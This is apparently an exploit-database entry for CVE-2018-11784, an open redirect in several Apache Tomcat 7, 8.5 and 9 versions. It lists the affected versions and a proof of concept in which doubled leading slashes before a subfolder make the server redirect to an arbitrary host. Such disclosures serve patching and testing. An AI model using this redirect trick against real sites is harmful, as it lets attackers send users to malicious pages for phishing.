These are details on an open redirection vulnerability in Apache Tomcat version 9.0.0M1 that was discovered in 2018.
e374b72f534a0d9e0f9dad4d4370a5f0b3b70a15b8a074782e0503384eb02aab
# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784
# Proof of Concept:
# Identify a subfolder within your application
http://example.com/test/
# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test
# Browse to the newly created URL and the application will perform a redirection
http://test/